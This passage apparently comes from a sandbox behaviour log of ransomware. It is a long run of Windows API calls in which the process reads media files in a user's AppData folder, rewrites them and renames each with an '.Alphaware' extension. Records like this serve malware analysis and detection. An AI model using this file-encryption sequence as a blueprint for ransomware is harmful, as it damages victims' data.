ftLastAccessTime.dwHighDateTime=0x1d97422, ftLastWriteTime.dwLowDateTime=0x887a7b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8660)) returned 1 [0091.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.070] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\rKqcydSq.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\rkqcydsq.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\rKqcydSq.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\rkqcydsq.mkv.alphaware")) returned 1 [0091.071] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\s8ZDF Lucr_Z28Spu.swf", dwFileAttributes=0x80) returned 1 [0091.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.071] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\s8ZDF Lucr_Z28Spu.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\s8zdf lucr_z28spu.swf"), fInfoLevelId=0x0, lpFileInformation=0x252d5b0 | out: lpFileInformation=0x252d5b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7c9e6ed0, ftCreationTime.dwHighDateTime=0x1d9683a, ftLastAccessTime.dwLowDateTime=0xe10b9eb0, ftLastAccessTime.dwHighDateTime=0x1d968fd, ftLastWriteTime.dwLowDateTime=0xe10b9eb0, ftLastWriteTime.dwHighDateTime=0x1d968fd, nFileSizeHigh=0x0, nFileSizeLow=0xa6b1)) returned 1 [0091.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.072] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\s8ZDF Lucr_Z28Spu.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\s8zdf lucr_z28spu.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.072] ReadFile (in: hFile=0x250, lpBuffer=0x252d848, nNumberOfBytesToRead=0xa6b1, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x252d848*, lpNumberOfBytesRead=0x23eb38*=0xa6b1, lpOverlapped=0x0) returned 1 [0091.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.097] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\s8ZDF Lucr_Z28Spu.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\s8zdf lucr_z28spu.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.101] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\s8ZDF Lucr_Z28Spu.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\s8zdf lucr_z28spu.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9e6ed0, ftCreationTime.dwHighDateTime=0x1d9683a, ftLastAccessTime.dwLowDateTime=0xe10b9eb0, ftLastAccessTime.dwHighDateTime=0x1d968fd, ftLastWriteTime.dwLowDateTime=0x887f3de0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf20)) returned 1 [0091.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.101] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\s8ZDF Lucr_Z28Spu.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\s8zdf lucr_z28spu.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\s8ZDF Lucr_Z28Spu.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\s8zdf lucr_z28spu.swf.alphaware")) returned 1 [0091.103] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\t2oMmxPi.flv", dwFileAttributes=0x80) returned 1 [0091.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.103] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\t2oMmxPi.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\t2ommxpi.flv"), fInfoLevelId=0x0, lpFileInformation=0x25d7888 | out: lpFileInformation=0x25d7888*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdcc414f0, ftCreationTime.dwHighDateTime=0x1d96d66, ftLastAccessTime.dwLowDateTime=0x84ce7f10, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x84ce7f10, ftLastWriteTime.dwHighDateTime=0x1d97635, nFileSizeHigh=0x0, nFileSizeLow=0xe12e)) returned 1 [0091.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.103] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\t2oMmxPi.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\t2ommxpi.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.104] ReadFile (in: hFile=0x250, lpBuffer=0x25d7ad0, nNumberOfBytesToRead=0xe12e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25d7ad0*, lpNumberOfBytesRead=0x23eb38*=0xe12e, lpOverlapped=0x0) returned 1 [0091.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.160] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\t2oMmxPi.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\t2ommxpi.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\t2oMmxPi.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\t2ommxpi.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcc414f0, ftCreationTime.dwHighDateTime=0x1d96d66, ftLastAccessTime.dwLowDateTime=0x84ce7f10, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x8888c360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12d08)) returned 1 [0091.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.165] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\t2oMmxPi.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\t2ommxpi.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\t2oMmxPi.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\t2ommxpi.flv.alphaware")) returned 1 [0091.166] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\te-nH.flv", dwFileAttributes=0x80) returned 1 [0091.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.166] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\te-nH.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\te-nh.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebe88 | out: lpFileInformation=0x23ebe88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xb00a9e30, ftCreationTime.dwHighDateTime=0x1d975d5, ftLastAccessTime.dwLowDateTime=0x470975e0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0x470975e0, ftLastWriteTime.dwHighDateTime=0x1d97694, nFileSizeHigh=0x0, nFileSizeLow=0x13507)) returned 1 [0091.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.166] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\te-nH.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\te-nh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.167] ReadFile (in: hFile=0x250, lpBuffer=0x23ec0c0, nNumberOfBytesToRead=0x13507, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23ec0c0*, lpNumberOfBytesRead=0x23eb38*=0x13507, lpOverlapped=0x0) returned 1 [0091.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.208] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\te-nH.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\te-nh.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.213] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\te-nH.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\te-nh.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00a9e30, ftCreationTime.dwHighDateTime=0x1d975d5, ftLastAccessTime.dwLowDateTime=0x470975e0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0x888fe780, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19ce0)) returned 1 [0091.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.213] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\te-nH.flv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\te-nh.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\te-nH.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\te-nh.flv.alphaware")) returned 1 [0091.215] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\UK0_T4zjWaC.wav", dwFileAttributes=0x80) returned 1 [0091.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\UK0_T4zjWaC.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\uk0_t4zjwac.wav"), fInfoLevelId=0x0, lpFileInformation=0x246c9b0 | out: lpFileInformation=0x246c9b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x580760, ftCreationTime.dwHighDateTime=0x1d968a2, ftLastAccessTime.dwLowDateTime=0xcd70dc50, ftLastAccessTime.dwHighDateTime=0x1d96c66, ftLastWriteTime.dwLowDateTime=0xcd70dc50, ftLastWriteTime.dwHighDateTime=0x1d96c66, nFileSizeHigh=0x0, nFileSizeLow=0x7b1e)) returned 1 [0091.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.215] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\UK0_T4zjWaC.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\uk0_t4zjwac.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.215] ReadFile (in: hFile=0x250, lpBuffer=0x246cc08, nNumberOfBytesToRead=0x7b1e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x246cc08*, lpNumberOfBytesRead=0x23eb38*=0x7b1e, lpOverlapped=0x0) returned 1 [0091.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.243] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\UK0_T4zjWaC.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\uk0_t4zjwac.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.246] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\UK0_T4zjWaC.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\uk0_t4zjwac.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x580760, ftCreationTime.dwHighDateTime=0x1d968a2, ftLastAccessTime.dwLowDateTime=0xcd70dc50, ftLastAccessTime.dwHighDateTime=0x1d96c66, ftLastWriteTime.dwLowDateTime=0x8894aa40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa4f4)) returned 1 [0091.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.246] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\UK0_T4zjWaC.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\uk0_t4zjwac.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\UK0_T4zjWaC.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\uk0_t4zjwac.wav.alphaware")) returned 1 [0091.248] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vaZJJgsh9Q1-hrf7S7.avi", dwFileAttributes=0x80) returned 1 [0091.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vaZJJgsh9Q1-hrf7S7.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vazjjgsh9q1-hrf7s7.avi"), fInfoLevelId=0x0, lpFileInformation=0x25422a0 | out: lpFileInformation=0x25422a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a905870, ftCreationTime.dwHighDateTime=0x1d96a6e, ftLastAccessTime.dwLowDateTime=0xe2a8e0, ftLastAccessTime.dwHighDateTime=0x1d96fad, ftLastWriteTime.dwLowDateTime=0xe2a8e0, ftLastWriteTime.dwHighDateTime=0x1d96fad, nFileSizeHigh=0x0, nFileSizeLow=0xb3da)) returned 1 [0091.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.252] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vaZJJgsh9Q1-hrf7S7.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vazjjgsh9q1-hrf7s7.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.252] ReadFile (in: hFile=0x250, lpBuffer=0x2542538, nNumberOfBytesToRead=0xb3da, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2542538*, lpNumberOfBytesRead=0x23eb38*=0xb3da, lpOverlapped=0x0) returned 1 [0091.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.498] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vaZJJgsh9Q1-hrf7S7.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vazjjgsh9q1-hrf7s7.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vaZJJgsh9Q1-hrf7S7.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vazjjgsh9q1-hrf7s7.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a905870, ftCreationTime.dwHighDateTime=0x1d96a6e, ftLastAccessTime.dwLowDateTime=0xe2a8e0, ftLastAccessTime.dwHighDateTime=0x1d96fad, ftLastWriteTime.dwLowDateTime=0x88bd21a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf0a0)) returned 1 [0091.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.505] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vaZJJgsh9Q1-hrf7S7.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vazjjgsh9q1-hrf7s7.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vaZJJgsh9Q1-hrf7S7.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vazjjgsh9q1-hrf7s7.avi.alphaware")) returned 1 [0091.508] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vCNVmrhf2U7XXJBaxRmB.pps", dwFileAttributes=0x80) returned 1 [0091.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vCNVmrhf2U7XXJBaxRmB.pps" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vcnvmrhf2u7xxjbaxrmb.pps"), fInfoLevelId=0x0, lpFileInformation=0x23e0b68 | out: lpFileInformation=0x23e0b68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf4463a60, ftCreationTime.dwHighDateTime=0x1d9672e, ftLastAccessTime.dwLowDateTime=0x7fff2d40, ftLastAccessTime.dwHighDateTime=0x1d9674e, ftLastWriteTime.dwLowDateTime=0x7fff2d40, ftLastWriteTime.dwHighDateTime=0x1d9674e, nFileSizeHigh=0x0, nFileSizeLow=0xd356)) returned 1 [0091.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.509] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vCNVmrhf2U7XXJBaxRmB.pps" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vcnvmrhf2u7xxjbaxrmb.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.509] ReadFile (in: hFile=0x250, lpBuffer=0x23e0e10, nNumberOfBytesToRead=0xd356, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23e0e10*, lpNumberOfBytesRead=0x23eb38*=0xd356, lpOverlapped=0x0) returned 1 [0091.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.533] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vCNVmrhf2U7XXJBaxRmB.pps" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vcnvmrhf2u7xxjbaxrmb.pps"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.537] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vCNVmrhf2U7XXJBaxRmB.pps" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vcnvmrhf2u7xxjbaxrmb.pps"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4463a60, ftCreationTime.dwHighDateTime=0x1d9672e, ftLastAccessTime.dwLowDateTime=0x7fff2d40, ftLastAccessTime.dwHighDateTime=0x1d9674e, ftLastWriteTime.dwLowDateTime=0x88c1e460, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11aa0)) returned 1 [0091.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.538] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vCNVmrhf2U7XXJBaxRmB.pps" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vcnvmrhf2u7xxjbaxrmb.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vCNVmrhf2U7XXJBaxRmB.pps.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vcnvmrhf2u7xxjbaxrmb.pps.alphaware")) returned 1 [0091.543] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\w1qxUxlTv5acD7ekU7.mkv", dwFileAttributes=0x80) returned 1 [0091.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.543] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\w1qxUxlTv5acD7ekU7.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\w1qxuxltv5acd7eku7.mkv"), fInfoLevelId=0x0, lpFileInformation=0x2493cd8 | out: lpFileInformation=0x2493cd8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc0c85ce0, ftCreationTime.dwHighDateTime=0x1d968eb, ftLastAccessTime.dwLowDateTime=0x9134c250, ftLastAccessTime.dwHighDateTime=0x1d96bef, ftLastWriteTime.dwLowDateTime=0x9134c250, ftLastWriteTime.dwHighDateTime=0x1d96bef, nFileSizeHigh=0x0, nFileSizeLow=0xe2f9)) returned 1 [0091.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.591] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\w1qxUxlTv5acD7ekU7.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\w1qxuxltv5acd7eku7.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.592] ReadFile (in: hFile=0x250, lpBuffer=0x2493f70, nNumberOfBytesToRead=0xe2f9, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2493f70*, lpNumberOfBytesRead=0x23eb38*=0xe2f9, lpOverlapped=0x0) returned 1 [0091.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.617] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\w1qxUxlTv5acD7ekU7.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\w1qxuxltv5acd7eku7.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\w1qxUxlTv5acD7ekU7.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\w1qxuxltv5acd7eku7.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c85ce0, ftCreationTime.dwHighDateTime=0x1d968eb, ftLastAccessTime.dwLowDateTime=0x9134c250, ftLastAccessTime.dwHighDateTime=0x1d96bef, ftLastWriteTime.dwLowDateTime=0x88cdcb40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12f74)) returned 1 [0091.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.621] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\w1qxUxlTv5acD7ekU7.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\w1qxuxltv5acd7eku7.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\w1qxUxlTv5acD7ekU7.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\w1qxuxltv5acd7eku7.mkv.alphaware")) returned 1 [0091.623] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wY-iL 75UNFS8BKTR.wav", dwFileAttributes=0x80) returned 1 [0091.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wY-iL 75UNFS8BKTR.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wy-il 75unfs8bktr.wav"), fInfoLevelId=0x0, lpFileInformation=0x254af10 | out: lpFileInformation=0x254af10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc0090960, ftCreationTime.dwHighDateTime=0x1d97671, ftLastAccessTime.dwLowDateTime=0x18e72e90, ftLastAccessTime.dwHighDateTime=0x1d97677, 